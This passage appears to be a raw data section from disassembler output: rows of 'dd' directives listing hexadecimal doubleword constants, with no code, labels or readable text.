		dd 0F2ECF120h, 0EAE62651h, 18BDA69Ch, 5B6848A2h, 0DDD3A57Fh
		dd 92FA81EFh, 84BD004Eh, 321C9007h, 0AD10DDF5h,	6CEB88E1h
		dd 7891FD46h, 0C6B1A89h, 849AAD4Bh, 9A32940Dh, 97401AE4h
		dd 3465986Eh, 337B492Ah, 4BA1DF92h, 1CBB7B7Dh, 21720347h
		dd 65702804h, 8D4E52B2h, 8C52EA9Dh, 0A390D1B4h,	0D5BFFD7Eh
		dd 4EEE3743h, 874F1CDCh, 0E6C24EB3h, 3BA91F25h,	0BDD84A87h
		dd 9EBB66AAh, 79A67527h, 0B04E9B1Eh, 0D46FC6E2h, 0F28E750Dh
		dd 0ADA2AE12h, 9F4BD14Dh, 693FC17Eh, 0BA96303Ch, 98033220h
		dd 5FB1617Bh, 0BBAD6461h, 0FD737495h, 0E001AC93h, 157C9605h
		dd 0B1A55B06h, 4F0E9C42h, 76AAD3FFh, 2DC20785h,	3E52C336h
		dd 5F8A36A3h, 967C4BE0h, 5FE8DBE5h, 741FD559h, 57DAD4EEh
		dd 0F31C4158h, 0A3BA0062h, 250E4C1Eh, 7EEE93ECh, 0A1789B05h
		dd 924CABF0h, 8BC4AF4Bh, 0E0FFBD0h, 0F5A1AA91h,	78CA8608h
		dd 0CDF67B38h, 64AF9711h, 4C699AC1h, 9D33E9B6h,	2373AD14h
		dd 447E3879h, 0FBF86B12h, 287E7895h, 0FF802970h, 3E9C2282h
		dd 65D7B246h, 0D3581E14h, 1681C6CCh, 4F5CA57Dh,	0F2E348C1h
		dd 0F20D2303h, 0B49CE44Bh, 6A817A32h, 0C7CC9581h, 0EC533534h
		dd 14ABAD2Ch, 43F1A60Eh, 0DC1E8E7Eh, 0A9073A47h, 0D9F71385h
		dd 0A95AAA86h, 7D2745C0h, 0DB8D3132h, 0AE9DF17Ah, 38605AAAh
		dd 44EE9354h, 7395107Bh, 358BB287h, 23FCFADCh, 0DA1A990Dh
		dd 7D8EFA7h, 0A3DFD7CEh, 88BFC0F8h, 83830ADEh, 0B3042A53h
		dd 3C7FC107h, 0DCF8AEA2h, 359E4CF7h, 0E3C4C52h,	0CD8F4EEAh
		dd 22B2BBCCh, 936CF717h, 77302DAh, 0FBAAA511h, 34D2666Ah
		dd 5DBA1999h, 1ACBC3F0h, 5B250AE5h, 0ABF3FD73h,	0C6DDD7ACh
		dd 0EECEE0E1h, 6E70EBBCh, 924850A3h, 47375096h,	923A11AFh
		dd 0B32C63EFh, 39F7A832h, 0FA62E6FFh, 33FCE39Eh, 2BD7BC41h
		dd 0C9517533h, 9A5432Eh, 5A105CB7h, 0D29B55A8h,	4FD1EBD2h
		dd 5E0E09C4h, 8431B886h, 954B2FE4h, 0CC5E1368h,	7A81EEC8h
		dd 0DF6416A8h, 2D134DA2h, 7E2BEB89h, 50695278h,	0F47A3987h
		dd 0A9BEB64Ah, 0CC3592E9h, 3FC443AAh, 0D795F29Ah, 0F1665A65h
		dd 928B0BB9h, 0F4C73DAAh, 5F274501h, 28ECD21Fh,	4C8A8DB0h
		dd 0B617181Eh, 0E775E3DFh, 7EEEF4E8h, 65701869h, 5995EF4Dh
		dd 536F4AABh, 2ABF7C7Ah, 4756A442h, 529EF2DDh, 70EA9768h
		dd 2CA6EA73h, 0ACD4D649h, 4871878Fh, 2C4ACA53h,	5D046ABFh
		dd 17081509h, 972DD963h, 0ED33CEB3h, 4F89EB3Ah,	0A589D1A6h
		dd 0D7EC42C9h, 6666E4CDh, 840DD59Eh, 0E55B4E48h, 5B78B15Bh
		dd 8F8EAE92h, 26D0A916h, 3F6AB189h, 2E65DD30h, 6C565C7Ah
		dd 81739064h, 9683D42Fh, 3DC57CF3h, 9CD0D029h, 0D2FE4F48h
		dd 8A913634h, 0F1A06E2Dh, 6CCB28E0h, 25CDA169h,	0D7F2736Dh
		dd 0D5727973h, 0D11A6B36h, 0FD8BD446h, 0CF41C066h, 0B2EC6E46h
		dd 5B4964A7h, 492858BAh, 0B65760F8h, 0EA44C8Bh,	81FBECBCh
		dd 11AD4A2Fh, 5C9AF771h, 6A7423B8h, 6F612CC5h, 8F97BBE3h
		dd 0D7FA8FBh, 0DA213A3h, 68A76A0Fh, 0F56C4076h,	8CD2E554h
		dd 9DD804ADh, 0F318D092h, 0AB8AAB65h, 0EBF4C41Ch, 0EF9EDE75h
		dd 628E8D4Ah, 0CB6F1E5Ah, 0D5BC8D51h, 0E350392Bh, 0D8A30F3Ah
		dd 0CBB91DBh, 5DF7263Eh, 0B72EF46Bh, 0F6BF473Eh, 5B313D53h
		dd 9C89E08Ah, 373F4C68h, 0A1EECD3Fh, 302FE0h, 394ABB9Bh
		dd 7E2D9D57h, 6227A2DCh, 69F0348Ah, 3A613A8Ah, 4554B8A6h
		dd 3C053CAFh, 0C8B494DBh, 0EBE697ABh, 7CB855F0h, 1BCDDC49h
		dd 97F91E17h, 0B51A07ACh, 7C714473h, 2282A018h,	0AE409158h
		dd 0F468C344h, 5DC943C1h, 0F93FFFB9h, 0B6E9D545h, 0EC2F7A66h
		dd 0EBB87DE4h, 0BF2B9DF7h, 0CE7C3B75h, 3109FE44h, 548DD8D7h
		dd 4EA143F0h, 8A9A71B2h, 0E90FB3D6h, 0FD22EA19h, 3607BAAAh
		dd 0F659E12Fh, 579FD10Ch, 0A6DBBECCh, 57CBDFA7h, 0D6A3F097h
		dd 3B88DC15h, 515DEDE5h, 57C5E69Fh, 0D2553161h,	0B7EA8EE1h
		dd 0D2B3CEFEh, 5836D5D4h, 0BFD26E8h, 19F24707h,	765D34EAh
		dd 0BD91ABBCh, 0EBFA1D5Bh, 542EE748h, 3A9E8C22h, 0B02A1E38h
		dd 0C0D48921h, 0D41736C7h, 13E44E35h, 0C630CAD7h, 0D28AADA1h
		dd 8A760D97h, 0B8C06BBFh, 77422BA8h, 0FE2C108h,	2F8349BDh
		dd 0C1177002h, 0CAB692FAh, 0ED1E5978h, 8308D354h, 6DAC6E6Eh
		dd 0F17EB3B8h, 0A9A6F02Bh, 0B01B1DBBh, 0F6DE53C2h, 7D838360h
		dd 2BEC355Ah, 0F6AF545Fh, 13F7B451h, 0CCE13929h, 2D2B7478h
		dd 3B14157Eh, 0D3D1F486h, 9AC067BEh, 0B7DB87F4h, 0FACF7574h
		dd 0B94AF7E7h, 4A78D479h, 0D4D9D94Bh, 72D6EC44h, 351633A5h
		dd 90AFDEDAh, 0FA0F9E05h, 81233A27h, 783D1939h,	3A78295Ah
		dd 0EE1DCAD1h, 654C79ABh, 0E1CCA2AFh, 72B4FBF3h, 7B78A2A6h
		dd 1D19B733h, 0A47670FCh, 27275F93h, 0F5423F1Ah, 0ACE5153Fh
		dd 6AFBAF68h, 1910AFDBh, 0BE66AAC4h, 0F30D22D0h, 38166A6Fh
		dd 7FD64E29h, 0E3422C0Fh, 0EBAD9DC1h, 0DE189F4Fh, 1296FF25h
		dd 0B1A88F85h, 0C83E978Eh, 76FE7697h, 0CD72C59Fh, 14FB5C95h
		dd 70C913C9h, 75DDBB1Eh, 3AF6BCB9h, 481B3F25h, 88C6BD8Eh
		dd 81FB291Dh, 0DF85CABFh, 906ECE73h, 0AF19615Eh, 0FCA6EB2Fh
		dd 537B0A3Ah, 17ED38A6h, 0C87EBEEh, 6512BEB2h, 398E3304h
		dd 1D21CB9Dh, 5568C352h
		dd 6D79F6B4h, 13F97D5Bh, 1BBB9473h, 7E8B8563h, 9865BDD5h
		dd 0A1CAE252h, 2BE572AFh, 5A3FD2A5h, 5105607Eh,	45E46F79h
		dd 0FA25AAD1h, 0F618D4E5h, 1F1BE735h, 0ADFEB2B5h, 39A0FD50h
		dd 5C7EB8Fh, 0EE11D3C5h, 513F4C56h, 6A957FE6h, 0C03545F8h
		dd 5D3BC177h, 0C7645898h, 71E226C5h, 32BDB5FCh,	3ABA3C38h
		dd 35689917h, 0C21EAE94h, 7730B5CBh, 0FA16D9CBh, 2D00FAB4h
		dd 7E343821h, 70B99678h, 0E460FC4Dh, 0CB0F396Bh, 0F5A261F0h
		dd 0F12881FEh, 35DA49F6h, 3B0674DCh, 0F7A313A7h, 0D7FB234Eh
		dd 68F6332Ch, 0A0B4ED19h, 6B2AF551h, 0E24B9F6Dh, 87E2278Ah
		dd 86289712h, 12D166F7h, 3388A653h, 0AFF475D5h,	8D5FC625h
		dd 0B0ECFF29h, 9719D257h, 0CCFEB1DCh, 48E6E6CDh, 0B0BF4AD7h
		dd 7B17948h, 511E7EB6h,	0E0AA5DA9h, 2C9F2952h, 8D095C0Dh
		dd 0D1F16A31h, 6343B54Ah, 0D7EEF350h, 385E3398h, 0DD395929h
		dd 8763305h, 0CE231A09h, 6C0FAA31h, 0B9B33354h,	6B5B063Dh
		dd 5F715C9Ch, 1DD7792Dh, 0E55AA3Eh, 3D5CFC6Eh, 8F73C7BDh
		dd 7E204C88h, 0CA475B13h, 3FE3CF96h, 2CEADE8Dh,	0A12C8156h
		dd 8952BE24h, 442A9CD9h, 73114FEFh, 0AEE44B74h,	8B2C108Eh
		dd 62F4E96h, 0D3C17D8Ch, 3A662857h, 2D1159D7h, 821AE8D4h
		dd 56A29875h, 1331F3B2h, 0DCEA315Ch, 50B9276Bh,	651AE15Ch
		dd 0DDFA70FCh, 500078AEh, 6D771289h, 0E4E0D2E5h, 0D9DF0BB4h
		dd 0A8F54322h, 0FAFB5E0Fh, 3FBDF549h, 787C451h,	92A69F86h
		dd 0EFA45FCAh, 3A8497F0h, 0DD79BE5Eh, 2F435F7Eh, 3DDF74Eh
		dd 0F7FFEE4Fh, 2FBCC745h, 668FE751h, 8A769046h,	0ABB9CD79h
		dd 163E8548h, 0C910CE0Fh, 0E58CEF04h, 0BBF8AF3Ah, 91E79B1Ch
		dd 0BE0D92B5h, 0DE02CE3Ch, 52AA04F7h, 0EDDCBCAAh, 6BC72147h
		dd 95A4BB4Ch, 0BF8E2A4Fh, 8C0F730Dh, 30BA4D94h,	535B04D2h
		dd 75A44895h, 448F0FC1h, 0EBB482E7h, 0D74544F9h, 92E62216h
		dd 1DBBE115h, 5BA1B4D9h, 4DA99FF5h, 81D19CF7h, 1E96E56Eh
		dd 0B257088Eh, 0F8EF8DCCh, 7FA868EAh, 0EDB55885h, 428026E9h
		dd 94157495h, 5109065Eh, 0B0FC5F42h, 80C87426h,	0B44D5DEAh
		dd 0FCB6DD1h, 8B4DF57Eh, 2A532595h, 533DB7EFh, 3B55C3EAh
		dd 3446AD9Dh, 823AC8E8h, 76BEE70Ah, 1D967D15h, 0A938AAF5h
		dd 9ED6E237h, 96BF9DEFh, 0D72696A8h, 0D0A0F3B5h, 30D9F9ABh
		dd 0A6AE7837h, 0CEAEDB60h, 0EE80387Ah, 0BB858065h, 622D8C65h
		dd 0D71F1174h, 33536147h, 84D24450h, 6EBD92BFh,	0D9AC45BEh
		dd 1212A324h, 0F40BAB1Fh, 0D51D9F56h, 62FEB0EEh, 0D9ECF498h
		dd 47690ED3h, 81D05F71h, 0A895DFD6h, 46D45E00h,	4363D43h
		dd 85807559h, 0E3A9DD9Ch, 56B3BF1Bh, 9291C7E1h,	0D086DAA1h
		dd 0DC7DFF9Bh, 0AEB42BC5h, 0E08817B4h, 9538884Bh, 61C05A36h
		dd 0EEBF3B86h, 0EE4E972h, 38121626h, 6FDD3ABBh,	19AF82D1h
		dd 9935FC0Ch, 54F92BCBh, 10699E68h, 7BBA50EDh, 3FF6C42Ch
		dd 0FBBF302Ch, 7961F89h, 0C05633A7h, 0EDB8715Eh, 8EE2191Ch
		dd 8D955C2Fh, 29CA3E97h, 0DC1EA225h, 4350692Bh,	6D243465h
		dd 0C483C023h, 6F86381Fh, 1A5C8564h, 0EFC6B4FAh, 9DB34C12h
		dd 0BE774503h, 0BE477C52h, 9C690972h, 9FDFF8E5h, 0DD376869h
		dd 0AEF75F39h, 68E64625h, 0D5A334ACh, 5C494F60h, 31CE1CBEh
		dd 95D97EA1h, 4AB25BF1h, 0AACBBDA2h, 0C54830DDh, 0AB07FDC5h
		dd 0EE32BAA8h, 374CF10Bh, 1A96C723h, 1A803AA8h,	597DEA4Eh
		dd 0AF27061Dh, 0B0D9063h, 0AF9C386Fh, 0D4C79DEEh, 7597A188h
		dd 0C0AB4141h, 0FA69E4C2h, 6576ABE3h, 0E0B8E740h, 0E9E46A66h
		dd 0E367EE1Bh, 0D90BB10Ch, 54D7872Ah, 3CC0189h,	9B6427F4h
		dd 0BDC5EAE2h, 5D28648Bh, 0C4DA5B3h, 4DE97DDAh,	317A62BBh
		dd 0E32F2DA0h, 0E5B59E0Ah, 0BA0099D4h, 0A218DD53h, 0BA97F990h
		dd 0C6C044DEh, 0FA61F9C9h, 8360F8C4h, 9F143BF9h, 68F77EF8h
		dd 0C86C9B83h, 0FE97D358h, 0B6EA2E85h, 87B75896h, 2E16C861h
		dd 14B902A3h, 331CE40Eh, 3A259B77h, 4C030976h, 0B1AEED7Dh
		dd 8CE40967h, 5081E756h, 0B34E18BAh, 0BCF4F11Ch, 3867CD05h
		dd 68A39D47h, 0C5E07047h, 68E4AFB0h, 0BB97F58h,	0AFCC9A76h
		dd 11862ABBh, 0FE8F9CCFh, 0DC7CD6D8h, 0F3EE9F1h, 0BB238490h
		dd 2F21E93h, 9D9FB79Eh,	0AED3B944h, 1451B300h, 0ED8D6A59h
		dd 6B55C896h, 67F586E7h, 895CF1BFh, 650F3CF3h, 107C5D50h
		dd 0EA956A2Dh, 0C7E13FA8h, 0F8775137h, 0FD232025h, 7C31725Dh
		dd 464BC7C3h, 7758168Ah, 1E04C2BDh, 0E7AC68CEh,	0F929BA55h
		dd 0F1DFD6F7h, 0BE112FF3h, 0F6883D35h, 969745E0h, 22F3E25Ah
		dd 322B37D5h, 0D8737532h, 0E17F81E7h, 95E6F0BBh, 0B46F3FA4h
		dd 0B4ED89F4h, 816E5F41h, 0E61C5358h, 5CFA0CBCh, 0A229ACB9h
		dd 0C260D18Dh, 5E1A127Dh, 847AF21Ah, 0C7DC498Bh, 27856ED5h
		dd 0C752B92Fh, 1FC8A3D9h, 0EF733A4Ch, 90BCF54Ch, 3D98C5F0h
		dd 70669D53h, 74869053h, 2E471128h, 5F71518Ah, 1AAA6792h
		dd 5FC5A597h, 67FA65C2h, 5E0C2904h, 82ACA966h, 419372FEh
		dd 0C25A47DDh, 700CAEE7h, 34A34E31h, 0FEB9075Ah, 3027897Dh
		dd 11DACE8Bh, 34771F45h, 0D4223B15h, 639FF6AEh,	8CC57329h
		dd 386834BAh, 0FD8045D8h, 7CC93DE5h, 0C18B1954h, 0A68495FAh
		dd 55C1EB93h, 0AD1717ABh, 0DF96F740h, 5A83A98Dh, 0EAE9DD91h
		dd 12A55AEAh, 0DD66A1E3h, 0B91B9FAh, 703720EEh,	0D5517D01h
		dd 0C733B390h, 210D6C0Bh, 0C45A5F36h, 88D79FA7h, 64B2FFADh
		dd 978B32F3h, 9BE435D5h, 0F47DBEEh, 33EF9418h, 14E20769h
		dd 9F85B5DCh, 8789FC29h, 0D2F29DCBh, 8F3BCC6Fh,	1BF8B4F4h
		dd 0B4A9643Fh, 77347707h, 1F1EB7F3h, 1D1B6C49h,	7925CE4Eh
		dd 0E69AFDF0h, 354292BAh, 0D6503B27h, 2CFBE2ADh, 0C0D0802Fh
		dd 89E5375Eh, 0CC30A91Ah, 0F48ECD3Bh, 0ECA152E7h, 51471215h
		dd 0B285595Dh, 2A7815B9h, 8780239Ah, 594EBF6Ah,	26B5E849h
		dd 0AFCB1881h, 279E59BBh, 0DB030B5Ah, 56B15FE4h, 387BD782h
		dd 95B7D225h, 4AF5EC3Fh, 2953F256h, 893A05DFh, 968BFBF1h
		dd 60F8C58Ah, 0BF73DE7Bh, 0BF8E9453h, 89814741h, 0D5415765h
		dd 7F5ED6CCh, 0C06D06AFh, 0CF12258Ch, 0ABA7F7Dh, 68D1445Bh
		dd 5E37C749h, 0FECCD0DDh, 6E76ADC2h, 0ADB2B67h,	52CC8F14h
		dd 4786F67Dh, 36D96F2Ch, 0A3321614h, 8F888777h,	0BD02B0BAh
		dd 2D514B9Dh, 7E6BDD5Fh, 0A3C11027h, 0BF549C1Fh, 972533F1h
		dd 43F167AFh, 7C43AAD6h, 0D3899555h, 74A053C9h,	31DAFDC9h
		dd 0DBFA6B56h, 2193DA26h, 262106C6h, 49BC187Eh,	0B41BD657h
		dd 0EB1CE368h, 8770291Ah, 2CE071DFh, 8E82FE1Ah,	0CCAFE798h
		dd 603522AEh, 327A413Bh, 338C3BE2h, 0C1D96CADh,	79E7D3AEh
		dd 57029E5h, 0A53E8BF9h, 4BA71E16h, 628B8A70h, 3EB3B238h
		dd 0F3DEB9E8h, 0AB39B2Eh, 73CE9279h, 49E53F76h,	0C29743B1h
		dd 3200A357h, 0D3A7E65Dh, 0AED3B74Ah, 50384A9Eh, 152649D3h
		dd 60BAADB5h, 90AD06A4h, 0BAF9F326h, 0BDA51EB7h, 10BB6911h
		dd 2FE7DF64h, 0A8A65D9Eh, 0A313317h, 3AE80165h,	55CE35D0h
		dd 0C6EB16CCh, 0DC3C4B9Dh, 0C95133BEh, 309E5BDBh, 0A8E9B478h
		dd 2CD2A80Ah, 0F9669C4Ch, 3740C8C8h, 9AE0FF56h,	281361B2h
		dd 372FA94Ah, 0BBE9AE1Dh, 9CF5234Ch, 1B7F173Bh,	238468F4h
		dd 0E8DBB4F6h, 0C6C6A1CCh, 1EE98B26h, 0A59209C6h, 23582814h
		dd 0F8354381h, 0AD888C19h
		dd 174D2F22h, 4BA5FE2Fh, 48DC3E5Fh, 7CBFB114h, 0BBF42940h
		dd 7A9E4AA5h, 16FE2E5Bh, 9FE3D58Fh, 5C9BF9D5h, 0F50F3762h
		dd 968B50B6h, 0C070D74Dh, 1E53E1F4h, 3E67FEDCh,	2C1B26E7h
		dd 3E2522FFh, 905C51C9h, 3B235DCDh, 0E3AE1F88h,	556B490Fh
		dd 674EEC60h, 4D1B45F7h, 5276FD2Dh, 679E0E46h, 0E5290C30h
		dd 3A7B5B73h, 99D625AEh, 8984CDC0h, 0B00EA1F8h,	0F2A7E0CAh
		dd 0B58EC4AEh, 50B7E279h, 54B5DBC3h, 12E38731h,	0CCC5FEB8h
		dd 0B2207E68h, 3FBE415h, 32CEB463h, 0FA7C95DDh,	7B7F1C56h
		dd 0A2873296h, 768051B5h, 92FEFBB6h, 0F0A6C271h, 6EC89D55h
		dd 1F64E04h, 9398DEB5h,	0D1A1B3E1h, 0F1EA2D4Ah,	73ABF769h
		dd 97E1DD10h, 1EB5FDD4h, 0AD6977ADh, 98E0C8D2h,	0F66A783Ch
		dd 58A110E6h, 5F35638Dh, 9F7EB356h, 0F37FCC6Dh,	0F50502DFh
		dd 3FFCB5B5h, 0A63F633Dh, 726DE58h, 78D1A59Fh, 0DA8FD1F0h
		dd 0EA73553Dh, 0A3630FC0h, 4C696B20h, 0B257C0BAh, 60FABEEDh
		dd 743B2997h, 0E6D1EACh, 0DB707C94h, 7C2D6888h,	0E3B25015h
		dd 0AA505303h, 7144C749h, 0F1794406h, 0A2466CB6h, 1E029573h
		dd 0E54543ADh, 6E3A1F8Ch, 53F7D8E5h, 0B74BE073h, 70FEB58h
		dd 0DAB95B03h, 0BEC03EB3h, 798EAE9Eh, 0F2A3F3C7h, 1FD6BB6Bh
		dd 21FB8A42h, 265F55A1h, 0F5FB3F57h, 95AE341Eh,	425573D5h
		dd 35947081h, 2AD2DC69h, 1444C1D6h, 0A83C16BEh,	553365DBh
		dd 5A6C5D75h, 72941Dh, 32556C43h, 49ECA978h, 0F83C7DCFh
		dd 3B2F46B1h, 96F31C8Eh, 0CAEABE68h, 8C8E8A1Fh,	743EFC67h
		dd 4D551A7Eh, 66C1DCAFh, 4D8C438Bh, 5F817F4h, 0FFED776Eh
		dd 0CAED112Fh, 653D56D1h, 0FFF23458h, 554B55DCh, 0F93D1AA1h
		dd 0F5CD2D8Bh, 54663419h, 5CF31942h, 0A4EB538Ch, 6E3CDCCFh
		dd 4A8AA346h, 0C8C76FDEh, 6514FE2Dh, 693C5930h,	9969C4D7h
		dd 0E8DC8551h, 0F61BA3B0h, 7F0AD26Fh, 735703EDh, 0C7E9A786h
		dd 5A765945h, 0EBC451AAh, 4E67A893h, 0F0D77C4Eh, 37B55A4Ah
		dd 0D346A8ADh, 6C6106FCh, 3AF31E5Fh, 9F8922D4h,	60CEF0A6h
		dd 709D4AE4h, 0BCE0C08Ah, 151BC334h, 9CE99839h,	577781D6h
		dd 0C28B3AB2h, 0B0521D54h, 5606440Fh, 0C8D9796Dh, 7DFF5B1Eh
		dd 0CAD0FDB0h, 1F5B19DCh, 4626356Eh, 0A031AF59h, 0EA98894Ah
		dd 650EDA83h, 4E894A73h, 3535813h, 1E233554h, 2C894E1Ah
		dd 1095584Ch, 0C84BDF68h, 31E8CA54h, 13A73A05h,	0B7443BB8h
		dd 4877F17Dh, 0C1F5A62Bh, 0A125DB3Fh, 3A8B415Ch, 7C26D373h
		dd 213CD1D6h, 0E63FED51h, 0CC571284h, 960AA9EDh, 3FD3E6B3h
		dd 2310CEBFh, 0D360247h, 0F513BF06h, 0BF0C9981h, 686D1202h
		dd 0AE5E3AAEh, 0BCCE05A5h, 88555737h, 0AF67913Bh, 0EDEE748Eh
		dd 335CD8D4h, 0D6326318h, 0DFE6AFF0h, 8D090840h, 865CD053h
		dd 8A020FE7h, 4AE9AA8Ch, 8F8D8EEAh, 3C9391B3h, 26AF65C4h
		dd 182A3423h, 0E36883B5h, 0CFC2C9ADh, 82B74124h, 0F9B0455Eh
		dd 10E25A72h, 90AB3B1Ah, 8E305C46h, 74F66E74h, 7D774C3Ah
		dd 0FE5995Bh, 86ED0159h, 0C8B488C4h, 0CDE6E1F8h, 1A76FD57h
		dd 0B58ED2B4h, 0BF03F7D9h, 8A13F8EBh, 6B38177Eh, 0B0A3B4BAh
		dd 0C3F30941h, 0DAE27E25h, 7CF868CDh, 0D97C1F41h, 7A475034h
		dd 5586C0A6h, 0D40B837Dh, 0CA5817E0h, 0E6CED155h, 1A9FF68h
		dd 4AADCEC7h, 0F869AE95h, 0AF426887h, 59D13697h, 0BEE122D0h
		dd 85A02FC6h, 0AE3F7E36h, 0F7FE76E9h, 5C7045B2h, 0A51355D8h
		dd 5FCFD7A0h, 92A1DF9Ah, 0E3917120h, 0D727DCBAh, 0A352B15Ah
		dd 0A3A9F38Ah, 3BF592AFh, 0DD08B3CDh, 0E7B0E119h, 1B50F71Eh
		dd 738CD9ABh, 9FDCF59Bh, 55DC452h, 7C10A1Ch, 2226B6B7h
		dd 117D1Fh, 70800A35h, 50A4ADA5h, 0C2BBABB0h, 42521528h
		dd 301070Bh, 51959425h,	9E831882h, 3518764Eh, 9A89C078h
		dd 820851Ch, 0A746890Bh, 29D4218Fh, 0E94513A5h,	69D1B4A3h
		dd 2A74D3A6h, 29D34EBh,	8227353Ah, 0A689064Eh, 0E8AA5D13h
		dd 3A24D144h, 4E86743Dh, 0D3A19D11h, 0A4E82765h, 253A69D0h
		dd 54E8274h, 40D2E69Dh,	0CD118127h, 63A79711h, 91BED040h
		dd 0B604D0C9h, 6157D5F3h, 0CA7C3244h, 0E2FF6A66h, 2055458Ah
		dd 0F001F33Bh, 1C0072D0h, 8DB594CBh, 0DFC167DFh, 4E7B00FDh
		dd 62C03945h, 0AD5E4746h, 0CB322AA7h, 84A7B23Ch, 0FC5FB7EAh
		dd 8FDC9FD3h, 0CBBF5482h, 7D1C774Ah, 5C54BEB7h,	9641D1E7h
		dd 0DBFACEEFh, 0E3D7C30h, 82BD7FC8h, 0F067BC23h, 0CFE26975h
		dd 4AB62D15h, 0DB578252h, 77F84AF1h, 0A834F320h, 0FAFC892Ah
		dd 0DFAC4BA8h, 69781C3Dh, 3C1E3F0Eh, 0F852DA33h, 87027C71h
		dd 7C8E490Dh, 1E295FE4h, 23EB1D28h, 0F4C958BAh,	0B4662BC7h
		dd 82928CEBh, 0C63BDBECh, 0CF62AD49h, 0A6AA5CABh, 84BC97AEh
		dd 0D682E209h, 0D94AB62Ch, 0AE640B88h, 46772294h, 0B69666E3h
		dd 1BD1D062h, 0FCEB2511h, 0CED50FC0h, 3250E27Fh, 96AC2244h
		dd 6329FC6Dh, 0F9FDB7F0h, 0F146BDC5h, 0CF354571h, 3896164Ch
		dd 3287407Fh, 0B95EEB44h, 5EBBDBBFh, 88FE1CEEh,	5FE11481h
		dd 5A963FCAh, 34E2B3A0h, 9F2E306Ch, 49BC1F83h, 0D925C86Ah
		dd 47C64AF9h, 102EC3DBh, 265F29A6h, 0CCCF366Fh,	0B4E5951Ch
		dd 1D2ED5CFh, 2D5BE76Dh, 0EB100593h, 0F0BFC0F8h, 74846CF5h
		dd 0FED8AEC5h, 0ECAC4F0Bh, 98A1E432h, 7077A5B3h, 0A0402967h
		dd 18E88882h, 889A3EC9h, 238C69A2h, 0A2123E8Eh,	56847F7h
		dd 0A163BACFh, 4B98CEBFh, 0D028325Ah, 0BF4AD523h, 0ADF0AEE0h
		dd 0ACF8CDA0h, 0E4B80BFBh, 2DD1E9A5h, 0C282F679h, 0E5FD774h
		dd 5FCC9DBAh, 4ADC0B89h, 2A2F25B6h, 93E5A0F2h, 0BC64E05Ch
		dd 6A984F22h, 550995A4h, 0CC200530h, 0EBB85ADAh, 9F466BE3h
		dd 217AF7D2h, 58EF44B2h, 3EAEF1C9h, 4EC91A22h, 471E9341h
		dd 9B4A47A6h, 39937167h, 1F9C50C5h, 9E9DBBB8h, 32AE656Dh
		dd 36D459D4h, 0C0C8ABB7h, 0D678BD71h, 3856DCB2h, 7D9AA57Eh
		dd 0D955941Dh, 8B26899Bh, 0ED628398h, 13C6CA75h, 0C724FD39h
		dd 1D785BCDh, 17052DF8h, 52A91FA2h, 5C0FD69Bh, 0FD25B19Dh
		dd 6BB27799h, 0E41FC972h, 1025ECC0h, 0AE0B38ABh, 0C168B27Ch
		dd 768A3607h, 14E68DD2h, 0F2FB8F81h, 0B3DF6CDDh, 0B242A39Bh
		dd 5AAD79B6h, 1313A8B0h, 755BFE67h, 8D44021Bh, 0E6A503F1h
		dd 0CE1676BFh, 0A822EF01h, 0D656974Dh, 3F7AAFDBh, 64B498A2h
		dd 2D4E959Ah, 78FE496Dh, 0E7F7258Bh, 795AE6DDh,	0CD7FC98Eh
		dd 0A1EECEDh, 1F8E6AA0h, 0DA369502h, 4CE6D350h,	0AF266F37h
		dd 9C6E1796h, 53312910h, 1559BE50h, 1FBD2F0Eh, 1CC06AAh
		dd 7C61C73Fh, 0E242E4F0h, 1F2E853Bh, 0B79BFEF8h, 0AB00AAE5h
		dd 0AF7D19FAh, 30350DB2h, 33121FD1h, 0FF0DB838h, 7A71B456h
		dd 6AA95500h, 253B6262h, 87E35657h, 0A6A1CFA5h,	0F846D9Eh
		dd 0C7378C0Dh, 0C88A832Eh, 34735B41h, 0F6E3AEBBh, 9709A1C2h
		dd 0C7617DF9h, 0E823BA88h, 0F0E922FCh, 0CAC805F8h, 75D22419h
		dd 0CCDE87DDh, 0E55D1030h, 0DF79B41Dh, 0BB95B194h, 0BFD79DE0h
		dd 0DEA95898h, 59E8480Ah, 45728DE1h, 1BB165FEh,	0F43114DEh
		dd 42C90DD0h, 0B6118FBAh, 0BA37C9C5h, 31EF4A40h, 0EB2A5A4Bh
		dd 0DF086374h, 3F2DBCCAh, 52C529CCh, 49A35E54h,	0BA9393B4h
		dd 0C967D64Dh, 39DA4191h, 5F161A4Fh, 9F2EFC7Dh,	5FED0615h
		dd 40B3037Ch, 93E9A085h, 7EBAAD30h, 0CFEBE7C3h,	681FB51Eh
		dd 9C4566CFh, 11692AD6h
		dd 57FBD745h, 17F7D460h, 58F22E18h, 5495AD67h, 6BF2AC6Ch
		dd 0B7F62AADh, 4250849Bh, 7A8BABB2h, 17C177B9h,	0AB336D9h
		dd 8162959h, 0B6D0FBD7h, 9CDD07B5h, 0FCF17A34h,	0ACAB7777h
		dd 0C5B94AC4h, 0C3169C5Dh, 3BF51492h, 0D668E35Bh, 0B4656380h
		dd 0F2EA975Bh, 4EDA3AEBh, 92B94389h, 448E3654h,	23D276E1h
		dd 0DEFAB5Ah, 0E2E79D8Ch, 83AD4E5h, 3148FED7h, 0EC5A70B2h
		dd 350C92D7h, 0FD902C66h, 68159CF2h, 84AA465Ah,	0D7B700A3h
		dd 91CC6709h, 6BDB85ACh, 0FDBCA8Bh, 65DF99Dh, 25DF5B6h
		dd 0FE523651h, 83116F13h, 529492B9h, 42CE8F1Bh,	244CCAD1h
		dd 0C2EA39D5h, 56C8E3AEh, 7881B3FAh, 0CA354B91h, 5B12FC19h
		dd 616AB7CAh, 19E8079Eh, 5917AFD5h, 9CCE2F46h, 75B90123h
		dd 2F9D71B6h, 0A3B4C3FDh, 0BC0557C1h, 4E6A4F31h, 937A080Eh
		dd 2795BF9Fh, 0DFDA2DEDh, 18B5FD45h, 0C5FFC9D1h, 0DDC7F3E9h
		dd 5CF55E1Fh, 0FB1C2ED5h, 7DCD0658h, 0BBC75C53h, 0E5EE4784h
		dd 0FAC6C837h, 0EC0F0AE9h, 86953DB0h, 0DA320CF4h, 271A28CEh
		dd 87E01136h, 0A317B8h,	65642F2Eh, 0B62F4344h, 5C4AD8AAh
		dd 8BCB439Dh, 226285ABh, 0A86E42FFh, 0C13C2601h, 2F82D749h
		dd 232BB6B5h, 63EDEAD7h, 2E9B0106h, 294C31E1h, 0F463BE36h
		dd 1D78DD17h, 0AE31A037h, 0B537E14Dh, 6518A154h, 2BE21D1Ch
		dd 546FA73Ah, 8001FE36h, 992FB0EDh, 0CBE87B69h,	48E20276h
		dd 0CFE23495h, 0ECB32128h, 0EED3D1F9h, 0DF7054DEh, 0DF3E4546h
